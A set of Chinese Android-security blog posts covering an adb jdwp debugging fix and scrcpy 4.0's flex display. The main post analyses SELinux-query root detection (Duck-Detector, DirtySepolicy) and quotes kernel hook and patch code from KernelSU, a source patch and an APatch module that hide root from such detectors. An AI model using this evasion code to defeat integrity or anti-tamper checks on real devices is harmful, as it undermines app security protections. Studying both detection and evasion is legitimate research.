软件安全与逆向分析

解决一个安卓15/16调试APK运行adb jdwp无输出的问题

Thu, 14 May 2026 15:35:00 +0800

原创非虫 2026-05-14 15:35 湖北

解决一个安卓15/16调试APK运行adb jdwp无输出的问题

这个问题的起源是一个安卓学员发现在一台Pixel6的安卓16设备上，调试debugable的APK程序时，adb jdwp无输出的问题。不能打印jdwp端口，就没办法adb forward转发后开IDA的调试。

指令流程
	adb install app-release.apk
	adb shell am start -D -n com.example.ctf/.MainActivity
	adb shell ps -A | grep com.example
	adb jdwp

奇怪点在于16这台不行，小米的又可以。

我本地测试一加ACE 3Pro的安卓15，同样是没有输出。然后，我就让他使用LLDB在安卓Termux上直接调试会更简单。

但是他还是想弄清楚这个问题的底层原理，于是他经过一翻摸索，找到了原因。并把方案告诉了我。

https://android.googlesource.com/platform/packages/modules/adb/+/refs/heads/android15-s1-release/libs/adbconnection/adbconnection_client.cpp

我本机看了下，果然有安装类似的插件，并且adbd是stopped。不过我没卸载插件，只是让adbd起来。然后测试，发现成功了！

不错！在此给这位学员点赞！

希望大家在遇到技术问题尝试解决时，不是像我这样第一时间考虑换方案，而是能够像他一样保持探索的精神。

跳转微信打开

有意思的官方杀同人安卓投屏多窗口融合模式

Wed, 13 May 2026 15:42:00 +0800

原创非虫 2026-05-13 15:42 湖北

有意思的官方杀同人安卓投屏多窗口融合模式

上一篇《iOS虚拟手机可以玩窗口化融合的越狱插件》在结尾留过一个尾巴，顺手提到安卓平台现在也有了类似的工具，会单独写一篇。这一篇就来还这个愿，只是故事比预想中还要戏剧一点。

事情是这样的：X上一个的开发者推主先发了一条推，说自己刚搞完一个"融合模式"的安卓投屏工具，预计下周上线，欢迎大家来玩。结果没过几天，朋友告诉他scrcpy刚发布的4.0版本里加了一个几乎完全一样的功能，叫flex display。一查commit，scrcpy这边的提交功能的时间正在他发推的完不久。

这其实是同人圈很熟悉的桥段，"刚做完发完安利，官方就出了一模一样的东西"。只不过这次的"官方"是Genymobile这个团队，他们手里那把scrcpy，已经是安卓投屏事实上的标准。整件事看下来，又好笑又值得复盘，所以才有了这一篇。

同人作品AndDrive

先聊推主@1ittlecup搞的这个安卓投屏工具，从他给出的截图大致能拼出全貌。

工具叫AndDrive(D)，介绍写得很直白，无缝连接你的Mac和Android设备。界面上有两个Tab，一个叫"设备管理"，一个叫"应用列表"，当前选中的是一台Pixel 8，右上角有一个特别醒目的"融合模式"开关。下方搜索框旁边的应用列表里，显示着povo2.0、QQ、Shadowsocks、Shizuku这一类常用app的图标。

也就是说，它要做的并不是把整个Android手机屏幕投到Mac上那种传统方案，而是把单个app以独立窗口的形态投出来。每个app就是一个Mac原生外观的窗口，可以拖、可以摆、可以叠，和iOS那边MilkyWayReborn的窗口化思路精神上是一致的，只是平台从越狱iOS换成了原生安卓。

按推主的说法，这个工具基本已经做好，准备下周公开发布。从功能反推实现链路，基本可以猜到他在做这几件事：

通过adb或者类似通道在手机端启动一个server，接收来自Mac的指令。
在Android侧创建虚拟显示，把目标app拉起到虚拟display上，再截取这一块surface的画面。
把surface流编码后回传到Mac端，每个虚拟display对应一个Mac窗口。
反向把鼠标、键盘、剪贴板事件转发回Android侧，作用到对应的虚拟display。
同步Mac窗口的尺寸变化，让虚拟display的尺寸跟着实时调整，做到所见即所得。

这五件事，前四件是经典投屏方案的常规操作，scrcpy过去几年里基本都做过。真正卡住所有同类工具的是第五件，让虚拟display的尺寸跟着客户端窗口动态调整，而不是开始一次就锁死，这条路在Android上并不平坦。

scrcpy版本4.0

scrcpy v4.0是2026年5月12日发布的，作者是Genymobile的rom1v。这一版的changelog长得吓人，从SDL2迁移到SDL3、加了相机变焦和手电筒控制、加了--keep-active、修了一大堆Meta Quest闪烁问题。但站在这次故事的视角，里面最关键的一句只是这一行：

Add flex display support (#6772)

按官方说法，虚拟display现在可以打上"flex"标记，使用--flex-display或者短选项-x开启，开启之后虚拟display就能随着客户端窗口的大小动态resize。再配合--start-app这一类参数，就能直接把单个Android app拉起到一个可以自由缩放的桌面窗口里。

官方的demo命令本身就很有代表性：

scrcpy --new-display=/192 -x --start-app=org.mozilla.firefox --keep-active --no-vd-system-decorations

这一行命令做的事情是，创建一个dpi为192的新虚拟display，启用flex模式，在这个display上拉起Firefox，保持设备活跃，并且不绘制虚拟display的系统装饰。最终效果就是Mac桌面上多出一个看起来就像原生窗口的Firefox for Android，可以随便拖、随便缩。

官方文档里给出的其他玩法也都简单直接：

# 启动安卓系统设置,固定初始尺寸为1024x768、dpi 160
scrcpy --new-display=1024x768/160 --start-app=com.android.settings --flex-display
# 默认尺寸是1280x960,dpi是160
scrcpy --new-display --start-app=com.android.settings --flex-display
# 配合h265和高码率,大窗口下保持画质
scrcpy --new-display -x --video-codec=h265 -b16M

也就是说，推主那一套设备管理面板加应用列表的GUI壳子，如果只看核心能力，scrcpy 4.0用一行命令就能搞出大致一样的效果。这才是这次故事真正的痛点，不是scrcpy出了竞品，是scrcpy把这件事的核心能力以官方姿态一次性给齐了。

flex display核心能力

flex display在用户视角上的表现，可以拆成几个要点。

第一，每个flex display都是一个虚拟display，不是手机主屏的镜像。也就是说，给它装哪个app、装多大、按多少dpi渲染，完全和真机的物理屏幕脱钩，这本身就是窗口化所需要的前提。

第二，尺寸可以随客户端窗口动态变化，而不是开始时锁死。这是它和过去--new-display的最大区别。过去也能在投屏链路里再开一个虚拟display，但开多大就只能多大，要变只能关掉重开。

第三，可以指定初始尺寸和dpi。如果不指定，默认是1280x960、dpi 160。这两个值不是从主机屏幕推导出来的，而是写死的合理默认，理由很简单，做成自适应主机屏幕需要更多代码，并且会延后第一帧的时间，得不偿失。

第四，渲染策略和普通投屏不一样。普通投屏会把帧居中按比例铺满窗口，flex display下默认是1:1渲染到窗口左上角。这是为了让"客户端窗口大小"和"虚拟display大小"在视觉上严格对齐，而不是用缩放遮掩两者的不一致。

第五，会和--keep-active、--video-codec=h265、-bN这一类参数配合得很好。要让窗口长时间不锁屏，要让大窗口下保持画质，都有现成的开关。

这几条加起来就足以说明，flex display并不是一个临时拍脑袋加的小功能，它是scrcpy这一代版本里被刻意构造出来的"窗口化投屏"基础能力。

PR 6772的实现关键

scrcpy这次的flex display并不是一次性写完的，对应的PR是#6772，从flex-display.1一路改到flex-display.18，反复打磨了十八轮。看完PR描述就会明白，这个功能远比"加个resize调用"复杂得多。

最核心的能力，就是Android系统里这一个方法：

android.hardware.display.VirtualDisplay.resize(int, int, int)

这是个看起来再简单不过的接口，传宽、高、dpi三个参数就能改变虚拟display的尺寸。但要让它在投屏链路里稳定工作，需要解决一连串异步问题。

第一个问题是resize请求的合并。客户端在拖拽窗口的过程中会触发大量resize事件，如果每一次都老老实实发到设备，Android侧会内部把这些请求积压起来，最后渲染卡顿。scrcpy的做法是，客户端只保留最新一次值往下发，服务端也只在最终目标尺寸或旋转方向与当前不一致时，才重置capture和encoding会话。

第二个问题是resize事件的归因。一个虚拟display的尺寸可以因为两种原因变化，一种是客户端拖窗口主动让它变，一种是Android自己变，比如Alt+r触发的旋转。两者在服务端DeviceMonitor看来都是同一个display change事件，但只有后者需要重置capture/encoding。PR的解法是引入DisplayPropertiesTracker，把"客户端触发"和"系统自发"两种事件区分开，并通过#6159里加入的session元数据走线下发到客户端，告诉客户端这一帧的尺寸变化是不是它自己请求的结果。

第三个问题是闭环抖动。客户端发resize请求，设备异步给出新尺寸的帧，客户端再用这个帧反过来调整窗口，这条链路如果不加抑制，会陷入"客户端微调窗口，设备给新帧，新帧又触发客户端微调"的循环。这就是为什么客户端必须知道某一帧的尺寸变化是不是它自己引起的，是则不再调整窗口，不是才需要自适应。

第四个问题是渲染策略。在resize请求到帧实际变化之间存在一段无法消除的异步窗口，scrcpy引入了--render-fit选项，flex模式下把帧以1:1的方式渲染到窗口左上角。这段异步窗口里，客户端会临时看到黑边或者裁剪，这是物理上的延迟，只能尽量缩短。

第五个问题是resize过程中的画面glitch。PR描述里直接承认了这一点，virtualDisplay.resize()、虚拟display实际resize完成、系统派发display change事件、virtualDisplay.setSurface()这四件事跨多个Android进程，根本无法原子化。在resize瞬间，系统可能用旧尺寸往新surface上画，也可能用新尺寸往旧surface上画，这就是所谓"resize撕裂"的来源。

为了让这些细节稳得住，PR还把另外几个准备工作的小PR一起做了，#6746引入了--min-size-alignment，#6758处理encoder尺寸约束，#6766遵守视频capability上限，#6770修了方形display的旋转问题，#6771对齐虚拟display尺寸。这一串铺垫加上十八轮主PR迭代，才把flex display做到能进4.0正式版的程度。

同人和官方的位置

回到开头那个故事。AndDrive(D)和scrcpy的flex display在能力上确实重叠很多，但定位还是有差别的。

scrcpy一直走的是命令行风格，功能强大，选项多到一个屏幕装不下，对普通用户来说门槛并不低。AndDrive(D)从截图看是一个标准的Mac GUI应用，有设备列表、应用列表、一键开关融合模式，这一套交互恰好是scrcpy多年都没有补上的短板。如果AndDrive(D)继续打磨，它完全有机会以"scrcpy GUI壳"的姿态在桌面端站住脚。这一类壳子在GitHub上已经有过很多前辈，有的甚至比scrcpy本体还火。

但前提是要先承认一个事实，在投屏这条路上，scrcpy就是事实标准。任何同类项目要么基于它，要么至少在技术细节上参考它。这次"官方杀同人"看起来戏剧，实际上是因为flex display这种功能本来就不是一个新点子。scrcpy的issue里相关讨论可以追溯到很久之前，#6350、#6351、#6705都是被这次PR取代的旧分支，最后由#6772一锤定音。从某种角度看，这反而说明这条路上的所有人都在朝同一个方向走。

至于推主自己那句"做了东西先过审再发帖"，倒是适用于任何一个开源生态的参与者。你不发，可能官方半年都不一定挪窝。你一发，官方也许第二天就把版本号往上跳一位。这两种风险都真实存在，只不过这次正好撞上了后一种。

写到这里就先收尾。如果有读者已经动手试了scrcpy 4.0的flex display，或者抢先体验到了AndDrive(D)的预览版，欢迎在评论里聊一聊各自的使用体验。

跳转微信打开

三大Root框架通杀检测与反检测方法分析

Tue, 12 May 2026 12:21:00 +0800

原创非虫 2026-05-12 12:21 湖北

最近比较流行通杀！前面讲过两篇Linux的通杀漏洞，
这次轮到安卓了。这一次又是Duck-Detector在搞事，老版本这个检测器C语言编写的，现在新版本使用C++重构开源了，挺值得学习的。
Duck这次公开了一个检测方法。可用于全版本Magisk检测，实际它也可以用于对KernelSU与APatch的检测。随后LSPosed沿用同一思路，整理出更精简的DirtySepolicy检测器。
与此同时，KernelSU与APatch社区也亮出了反检测的思路与代码。接下来，本篇主要介绍一下这个通杀检测的原理，以及三种过这个检测的方法。
文章作者：非虫（fei_cong@hotmail.com）

Duck-Detector检测原理

这次检测的核心思路，是把探针下沉到app_zygote进程，借助它对SELinux策略的查询能力，跳过传统的包名、进程名与文件路径扫描，直接向内核发问两件事：目标上下文是否存在、目标访问是否被放行。前者通过写入/sys/fs/selinux/context完成，后者则依赖android.os.SELinux.checkSELinuxAccess接口。

预加载类是整条检测链路的起点。当currentUid与appInfo.uid不一致，或Native库未能加载时，探针会直接产出一份可解析的失败快照，把"载体失效"与"发现Root痕迹"严格区分开来，避免环境异常被误判为命中。

classAppZygotePreload : ZygotePreload {
overridefundoPreload(appInfo: ApplicationInfo) {
val result = runCatching {
val currentUid = Os.getuid()
if (currentUid != appInfo.uid) {
                fallbackPayload("UID mismatch: $currentUid != app uid ${appInfo.uid}.")
            } elseif (!SelinuxContextValidityBridge.isNativeLibraryLoaded) {
                fallbackPayload("SELinux native library unavailable.")
            } else {
                SelinuxContextValidityBridge.nativeCollectContextValiditySnapshot()
                    .ifBlank { fallbackPayload("SELinux native snapshot payload was empty.") }
            }
        }.getOrElse { throwable ->
            fallbackPayload(throwable.message ?: "SELinux app zygote preload failed.")
        }
        SelinuxContextValidityBridge.setPreloadedRawData(result)
    }
}

Native层首先声明被检测的上下文与控制组。其中u:r:ksu:s0、u:object_r:ksu_file:s0、u:object_r:magisk_file:s0是Root相关类型，剩余四个上下文则用于自检oracle的可信度。

constexprconstchar *kSelinuxContextPath = "/sys/fs/selinux/context";
constexprconstchar *kExpectedCarrierType = "app_zygote";
constexprconstchar *kKsuContext = "u:r:ksu:s0";
constexprconstchar *kKsuFileContext = "u:object_r:ksu_file:s0";
constexprconstchar *magiskFileContext = "u:object_r:magisk_file:s0";
constexprconstchar *kNegativeControlContext = "u:r:duckdetector_context_oracle_sentinel:s0";
constexprconstchar *kStockFileControlContext = "u:object_r:system_data_file:s0";
constexprconstchar *kNegativeFileControlContext =
"u:object_r:duckdetector_context_oracle_sentinel_file:s0";

/sys/fs/selinux/context的职责是将输入上下文转换为内核sid。只要当前策略认可目标type，write()便会返回非负值，这正是判定"上下文存在"的唯一信号。

ContextCheckResult check_context_validity(constchar *context){
    ContextCheckResult result;
int fd = open(kSelinuxContextPath, O_RDWR | O_CLOEXEC);
if (fd < 0) {
        result.valid = false;
        result.note = std::string("Unavailable: ") + context + " errno=" + strerror(errno);
return result;
    }
constssize_t written = write(fd, context, std::strlen(context) + 1);
constint error = errno;
close(fd);
if (written >= 0) {
        result.valid = true;
return result;
    }
    result.valid = false;
    result.note = std::string("Unavailable: ") + context + " errno=" + strerror(error);
return result;
}

为防止偶然误判，检测链路对每个Root相关上下文都重复查询两次。只要两次结果不一致即进入UNSTABLE_RESULTS状态，这样即便Root管理器只拦截一次、或在不同入口给出不同答案，依然能够被识别。控制组中"正常上下文应通过、哨兵上下文应失败"四组判定全部符合预期之后，Root相关结果才会被采信；否则视为自检失败，所有KSU结论降级为附加信息。

checkSELinuxAccess走的则是访问向量计算的路径。Duck-Detector以app_zygote的身份充当查询者，覆盖以下四组访问关系：

检测点	source	target	class	perm	严重级
通用脏策略	system_server	system_server	process	execmem	WARNING
Magisk binder	untrusted_app	magisk	binder	call	WARNING
KernelSU binder	untrusted_app	ksu	binder	call	WARNING
LSPosed file read	untrusted_app	lsposed_file	file	read	DANGER

正向控制（app_zygote到isolated_app的process dyntransition）与反向控制（到哨兵文件类型）同样会做两次稳定性确认。其中Magisk与KernelSU的binder call属于辅助证据，而lsposed_file的读权限才是LSPosed残留的直接证据。Native快照只负责生产数据，展示层不再重新查询策略。

DirtySepolicy独立PoC

DirtySepolicy将同一检测入口浓缩为一个最小化的App。它舍弃了Duck的完整展示层与Native快照包装，重点是证明app_zygote可以直接调用SELinux.checkSELinuxAccess查询全局策略。配置层面，isolatedProcess配合useAppZygote会触发应用私有的Zygote，再由zygotePreloadName指定预加载类，载体便稳稳落在app_zygote之上。

<application
android:zygotePreloadName="org.lsposed.dirtysepolicy.AppZygote"><service
android:name=".DirtySepolicyService"
android:isolatedProcess="true"
android:useAppZygote="true" />application>

与Duck一样，PoC也把载体可信性的校验置于检测之前：先确认UID未被换掉、当前上下文确实是app_zygote，并验证getContext()、getPidContext()与/proc/self三处文件上下文完全一致。自检通过之后，再直接调用Framework API完成查询。

if (SELinux.checkSELinuxAccess("u:r:system_server:s0", "u:r:system_server:s0", "process", "execmem")) {
    sb.append("system_server can execmem; ");
}
if (SELinux.checkSELinuxAccess("u:r:fsck_untrusted:s0", "u:r:fsck_untrusted:s0", "capability", "sys_admin")) {
    sb.append("neverallow violated; ");
}
if (Build.TYPE.equals("user") && SELinux.checkSELinuxAccess("u:r:shell:s0", "u:r:su:s0", "process", "transition")) {
    sb.append("found AOSP su in user build; ");
}
if (SELinux.checkSELinuxAccess("u:r:adbd:s0", "u:r:adbroot:s0", "binder", "call")) {
    sb.append("found adb_root; ");
}
if (SELinux.checkSELinuxAccess("u:r:untrusted_app:s0", "u:r:magisk:s0", "binder", "call")) {
    sb.append("found Magisk; ");
}
if (SELinux.checkSELinuxAccess("u:r:untrusted_app:s0", "u:object_r:ksu_file:s0", "file", "read")) {
    sb.append("found KernelSU; ");
}
if (SELinux.checkSELinuxAccess("u:r:untrusted_app:s0", "u:object_r:lsposed_file:s0", "file", "read")) {
    sb.append("found LSPosed; ");
}
if (SELinux.checkSELinuxAccess("u:r:untrusted_app:s0", "u:object_r:xposed_data:s0", "file", "read")) {
    sb.append("found Xposed; ");
}
if (SELinux.checkSELinuxAccess("u:r:zygote:s0", "u:object_r:adb_data_file:s0", "dir", "search")) {
    sb.append("found ZygiskNext; ");
}

相比Duck，PoC的查询面更宽，涵盖了fsck_untrusted的sys_admin、shell到su的迁移、adbd到adbroot的binder call，以及Xposed与ZygiskNext的残留特征。它真正的价值并不在UI，而是揭示了一个事实：只要app_zygote能向内核问到当前策略，脏规则便会化作可读信号，用户态进程根本绕不开这道查询口。

KernelSU运行时过检测

KernelSU上游新增selinux_hide之后，过检测的思路便从"清掉策略"演变为"给应用UID呈现另一份备份策略"。当前策略仍然保留Root所需的全部规则，但应用态的查询入口被悄悄转向注入之前的策略副本。

backup_sepolicy在KernelSU追加自身域与文件类型之前便已生成。如此一来，后续隐藏逻辑无需伪造任何字符串，只需拿一张真实的旧策略表重新计算答案。

系统UID仍然走原始的context写入口，应用UID则改走backup_sepolicy。当检测器提交u:r:ksu:s0或u:object_r:ksu_file:s0时，旧策略里并不存在对应类型，转换随即失败，检测侧看到的便是"上下文不存在"。

staticssize_tmy_write_context(struct file *file, char *buf, size_t size)
{
if (likely(current_uid().val < 10000)) {
return orig_context_write(file, buf, size);
    }
char *canon = NULL;
    u32 sid, len;
ssize_t length;
    length = security_context_to_sid_with_policy(backup_sepolicy, buf, size, &sid, SECSID_NULL, GFP_KERNEL);
if (length)
goto out;
    length = security_sid_to_context_with_policy(backup_sepolicy, sid, &canon, &len);
if (length)
goto out;
memcpy(buf, canon, len);
    length = len;
out:
    kfree(canon);
return length;
}

checkSELinuxAccess最终触发的是访问向量计算。应用UID的输入被引导至backup_sepolicy重新计算，因此untrusted_app到ksu的binder call，以及untrusted_app到ksu_file的file read，不再按当前策略给出结果。

staticssize_tmy_write_access(struct file *file, char *buf, size_t size)
{
if (likely(current_uid().val < 10000)) {
return orig_access_write(file, buf, size);
    }
/* 省略参数解析与错误处理 */
    length = security_context_to_sid_with_policy(backup_sepolicy, scon, strlen(scon),
                                                 &ssid, SECSID_NULL, GFP_KERNEL);
if (length) goto out;
    length = security_context_to_sid_with_policy(backup_sepolicy, tcon, strlen(tcon),
                                                 &tsid, SECSID_NULL, GFP_KERNEL);
if (length) goto out;
    security_compute_av_user_with_policy(backup_sepolicy, ssid, tsid, tclass, &avd);
    length = scnprintf(buf, SIMPLE_TRANSACTION_LIMIT, "%x %x %x %x %u %x",
                       avd.allowed, 0xffffffff, avd.auditallow,
                       avd.auditdeny, avd.seqno, avd.flags);
return length;
}

除此之外，setprocattr current入口同样被纳入隐藏面，目标上下文统一交由backup_sepolicy解析，以防检测器从/proc/self/attr/current一侧绕开selinuxfs查询。

运行时方案的优势在于不必修改设备内核源码。具体做法是：通过kallsyms_lookup_name("write_op")定位selinuxfs的写操作表，再用ksu_patch_text将SEL_CONTEXT与SEL_ACCESS两个槽位替换为自定义函数，同时挂上selinux_setprocattr的LSM hook。

selinux_write_op = kallsyms_lookup_name("write_op");
context_write = &selinux_write_op[SEL_CONTEXT];
orig_context_write = *context_write;
ksu_patch_text(context_write, &my_write_context, sizeof(my_write_context),
               KSU_PATCH_TEXT_FLUSH_DCACHE);
access_write = &selinux_write_op[SEL_ACCESS];
orig_access_write = *access_write;
ksu_patch_text(access_write, &my_write_access, sizeof(my_write_access),
               KSU_PATCH_TEXT_FLUSH_DCACHE);
ksu_lsm_hook(&selinux_setprocattr_hook);

管理器侧的"隐藏SELinux修改"开关最终对应到KSU_FEATURE_SELINUX_HIDE这一特性位。开启之后，应用UID所见即为备份策略的答案；关闭之后，selinuxfs入口回归原始实现。截图中Duck的Danger显示为0，恰好与该功能的工作面相互印证。

内核源码级过检测补丁

Andrea仓库里的补丁直接动了security/selinux/ss/services.c。如果说运行时方案改的是selinuxfs入口，那么源码级方案改的便是SELinux服务函数本身：上下文解析与访问向量计算，统统在内核源码层被过滤。

补丁优先使用KernelSU上游已经暴露的backup_sepolicy；若该符号不存在，则回退到静态规则表与隐藏type表。静态表所覆盖的，恰好正是DirtySepolicy与Duck所查询的访问关系。

externstructselinux_policy *backup_sepolicy __attribute__((weak));
staticconststructselinux_hidden_av_ruleselinux_hidden_av_rules[] = {
    { "system_server", "system_server", "process", "execmem" },
    { "fsck_untrusted", "fsck_untrusted", "capability", "sys_admin" },
    { "shell", "su", "process", "transition" },
    { "adbd", "adbroot", "binder", "call" },
    { "untrusted_app", "magisk", "binder", "call" },
    { "untrusted_app", "ksu", "binder", "call" },
    { "untrusted_app", "ksu_file", "file", "read" },
    { "untrusted_app", "lsposed_file", "file", "read" },
    { "untrusted_app", "xposed_data", "file", "read" },
    { "zygote", "adb_data_file", "dir", "search" },
};
staticconstchar * const selinux_hidden_context_types[] = {
"su", "adbroot", "ksu", "ksu_file",
"magisk", "magisk_file", "lsposed_file", "xposed_data",
};

过滤逻辑只对app_zygote生效。系统服务与内核内部的正常计算依旧沿用原策略，从而将对系统运行的影响降到最低；检测器恰好倚仗app_zygote，因此正好落入过滤分支。

staticboolselinux_hidden_av_query_caller(struct policydb *policydb,
struct sidtab *sidtab){
structcontext *ccontext;
constchar *ctype;
    ccontext = sidtab_search(sidtab, current_sid());
if (!ccontext)
returnfalse;
    ctype = sym_name(policydb, SYM_TYPES, ccontext->type - 1);
return ctype && !strcmp(ctype, "app_zygote");
}

当app_zygote提交ksu、ksu_file、magisk_file等隐藏type时，补丁会让security_context_to_sid_core提前返回-EINVAL，Duck的/sys/fs/selinux/context检测因此只能得到"上下文无效"的回应。

staticboolselinux_hide_context_validity_query(struct policydb *policydb,
struct sidtab *sidtab,
constchar *scontext,
                                                u32 scontext_len){
unsignedint i;
if (!selinux_hidden_av_query_caller(policydb, sidtab))
returnfalse;
if (selinux_hide_context_query_with_backup(scontext, scontext_len))
returntrue;
for (i = 0; i < ARRAY_SIZE(selinux_hidden_context_types); i++) {
if (selinux_hidden_context_has_type(scontext, scontext_len,
                                            selinux_hidden_context_types[i]))
returntrue;
    }
returnfalse;
}

至于访问向量计算，则视backup_sepolicy是否可用分作两条路径：可用时将源、目标上下文映射到备份策略，重新计算av_decision；不可用时则按静态规则表清掉命中的permission位，核心逻辑仅有寥寥数行。

for (i = 0; i < ARRAY_SIZE(selinux_hidden_av_rules); i++) {
conststructselinux_hidden_av_rule *rule = &selinux_hidden_av_rules[i];
if (strcmp(rule->stype, stype) || strcmp(rule->ttype, ttype) ||
strcmp(rule->tclass, tclass_name))
continue;
    perm = selinux_perm_to_av(tclass_datum, rule->perm);
if (!perm)
continue;
    avd->allowed &= ~perm;
    avd->auditallow &= ~perm;
    avd->auditdeny |= perm;
}

这段代码被插入到security_compute_av_user()之中。checkSELinuxAccess底层一旦计算完成，结果会被立刻过滤，应用态最终拿到的，只能是处理之后的av_decision。该路径与KernelSU运行时方案如出一辙：不删当前策略，只把查询结果改写成旧策略本应给出的答案。

KPM运行时补丁方案

APatch社区给出的反检测方案，是一份名为selinux_magisk_access_filter的KPM（kernel patch module）。它与KernelSU上游selinux_hide同属"运行时挂钩"路线，但走的是KPM框架的hook_wrap，无需重编内核，也无需依赖backup_sepolicy这一上游符号。

整体思路可以浓缩为一句话：先在SELinux就绪时悄悄抓取一份干净策略，再在应用UID走到查询入口时，让它看到那份干净策略的回答。

KPM在init阶段一次性挂上10个selinuxfs与SELinux服务函数的钩子，覆盖检测器可能用到的所有入口。各目标的角色如下：

目标符号	作用
`security_read_policy`	给应用UID返回干净policy副本，绕开当前dirty策略
`security_load_policy`	标记"外部load"以识别脏策略加载
`sel_write_load`	计数`/sys/fs/selinux/load`写入次数
`sel_write_access`	拦截`/sys/fs/selinux/access`，命中Root类型即返回`-EINVAL`
`sel_write_context`	拦截`/sys/fs/selinux/context`，未在干净策略中出现即返回`-EINVAL`
`security_setprocattr` 或`selinux_setprocattr`	过滤`procattr current`一侧，防止从`/proc/self/attr/current`绕开
`context_struct_compute_av`	把应用UID的`policydb`参数替换成干净副本
`string_to_context_struct`	同上，用于上下文字符串到`context_struct`的转换
`selinux_complete_init`	SELinux首次就绪时触发干净策略快照
`selinux_policy_commit`	每次新策略生效后维护`first_policy`并刷新快照

辅助符号则按需通过kallsyms_lookup_name解析，包括vmalloc/vmalloc_noprof、vfree、copy_from_kernel_nofault（旧内核退化为probe_kernel_read）、security_context_to_sid、selinux_policy_cancel、sidtab_cancel_convert。任一关键符号缺失时，对应的过检测路径会安全降级而非崩溃。

干净策略的采集时机是selinux_complete_init或selinux_policy_commit的after回调，对应SELinux首次就绪和后续每次新策略落地。snapshot_clean_policy会调用security_read_policy复制出一份原始blob，并在blob中扫描MAGISK字样以标记g_clean_policy_has_magisk。

rc = g_security_read_policy(&blob, &len);
if (rc || !blob || !len)
return;
for (i = 0; i + 6 <= len; i++) {
if ((p[i] & 0xDF) == 'M' && (p[i + 1] & 0xDF) == 'A' &&
        (p[i + 2] & 0xDF) == 'G' && (p[i + 3] & 0xDF) == 'I' &&
        (p[i + 4] & 0xDF) == 'S' && (p[i + 5] & 0xDF) == 'K') {
        magisk_seen = true;
break;
    }
}
g_clean_policy_blob = blob;
g_clean_policy_len = len;

随后用security_load_policy把这份blob反序列化成内部load_state，作为应用态查询的备用引擎。需要注意的是，这次内部load是合法的"副本load"，因此KPM用g_internal_policy_load_depth计数把它与外部的脏策略load区分开来——只有计数为0的security_load_policy调用，才会被g_dirty_policy_seen标记。

sel_write_context钩子的核心，是用前面采集的干净blob反向校验当前查询样本是否合法。判定规则极简：把上下文按冒号切片，取最后一段type名，到干净blob里做字节比对。

if (!g_clean_load_state_ready || !g_clean_policy_blob ||
    clean_context_exists(sample)) {
    args->local.data0 = 3;        /* 放行 */
return;
}
args->skip_origin = 1;
args->local.data0 = 2;            /* 拦截 */
args->ret = (u64)(-EINVAL);

sel_write_access的处理类似，只是要把"scontext tcontext tclass"中的前两段都校验一遍，任一段在干净策略中找不到，便直接-EINVAL返回。context_struct_compute_av与string_to_context_struct两个钩子则更进一步：它们把传入的policydb第一参数替换为g_clean_policydb，这样即便检测器绕过了selinuxfs字符接口直接走Framework调用，最终的av_decision仍然由干净策略计算得出。

本方案与KernelSU方案的对照：

维度	KernelSU`selinux_hide`	APatch KPM
入口替换方式	`kallsyms_lookup_name("write_op")` +`ksu_patch_text`	KPM框架的`hook_wrap`
备份策略来源	内核内部`backup_sepolicy`，构造时机早于Root域追加	用`security_read_policy`+`security_load_policy`运行时重建
覆盖入口	`SEL_CONTEXT` 、`SEL_ACCESS`、`setprocattr current`	同上，并额外覆盖`compute_av`、`string_to_context`等更深层入口
适用平台	与KernelSU一同合入	任何能加载KPM的内核，无需源码改动

总体上，APatch的KPM思路与KernelSU运行时方案同源——都是"让应用UID看到一份不含Root类型的旧策略"。只是它把这件事完全放到模块层来做，连backup_sepolicy这一上游符号都可以舍弃，靠运行时再生成一份等价的"干净策略"来支撑后续所有查询路径。

KPM方案的限制

把上述思路真正落到产品级使用时，KPM方案有几条无法回避的限制需要正视。

限制一：加载时机必须早于Root域追加。

KPM的干净策略来自security_read_policy运行时读取，而不是像KernelSU那样在编译期就备份。一旦KPM加载晚于Root域注入，snapshot_clean_policy抓到的blob里就已经包含ksu、magisk_file等Root相关type，clean_context_exists("u:r:ksu:s0")随即返回true，KPM不仅不会拦截，反而会主动放行，检测器写入成功后直接判定ksu_domain_valid=true命中。因此该KPM不适合热加载，必须由APatch的bootkernel加载链在SELinux初始化之前就将其驻留到内核。

限制二：compute_av深层入口实际并未做策略重定向。

虽然KPM挂上了context_struct_compute_av与string_to_context_struct两个钩子，但其before_policydb_arg0回调中真正替换policydb参数的条件是g_clean_eval_depth > 0：

if (g_clean_eval_depth && clean_db && incoming) {
    args->arg0 = (u64)(uintptr_t)clean_db;
return;
}

g_clean_eval_depth只有在KPM自己调用g_security_context_to_sid做内部清洁评估时才会临时大于零；对外部直接调用这两个函数的情况，本钩子退化为观察者，只负责检测脏策略并触发快照，并不实际改写计算输入。这与KernelSU的my_write_access把应用UID的av_decision计算彻底引导到backup_sepolicy不同。

实战中这个不等效之所以没有暴露，是因为Duck与DirtySepolicy走的都是/sys/fs/selinux/access这一用户态写入路径，被前面的sel_write_access钩子提前拦截了；一旦未来出现绕过/sys/fs/selinux/access、直接经compute_av系内核内部入口探测的检测器，本KPM将失守，而KernelSU仍可拦截。

限制三：clean_context_token_exists基于字节子串匹配。

KernelSU走的是security_context_to_sid_with_policy(backup_sepolicy, ...)，由内核策略引擎给出标准答案；而本KPM则是在blob里做ASCII子串扫描，匹配的是":后到行尾的最后一段type名"。这意味着若干净策略里恰好出现某Root相关字符串作为其他type名的子串，存在理论上的误判风险。实践中Root相关type名（ksu、magisk、magisk_file、ksu_file、lsposed_file、xposed_data）通常是独立token，干净策略里不存在与之构成部分匹配的合法type，故误判概率极低，但仍是潜在脆弱点。

限制四：security_read_policy双ABI不兼容。

本KPM对security_read_policy只按"无state参数"的2参形态调用：

typedefint(*security_read_policy_t)(void **data, size_t *len);

而Android 13/14对应的5.15内核里，该函数仍是int security_read_policy(struct selinux_state *, void **, size_t *)三参形态。在那类内核上直接以2参签名调用会因参数错位而security_read_policy提前失败，整个干净策略快照流程便走不下去，KPM也就退化为纯观察者。如要兼容旧内核，需要额外按kver分支选择正确的调用约定。

限制五：依赖kallsyms_lookup_name解析符号。

KPM挂钩的10个目标和7个辅助函数全部依赖kallsyms_lookup_name返回有效地址。在/proc/kallsyms被禁用或符号被剥离的发行版内核上，security_read_policy、sidtab_cancel_convert、copy_from_kernel_nofault等任一关键符号缺失，对应钩子就会被跳过，相关检测路径不再被拦截。KPM加载日志中需要逐项确认这些符号是否解析成功。

限制六：策略热更新场景下的快照陈旧问题。

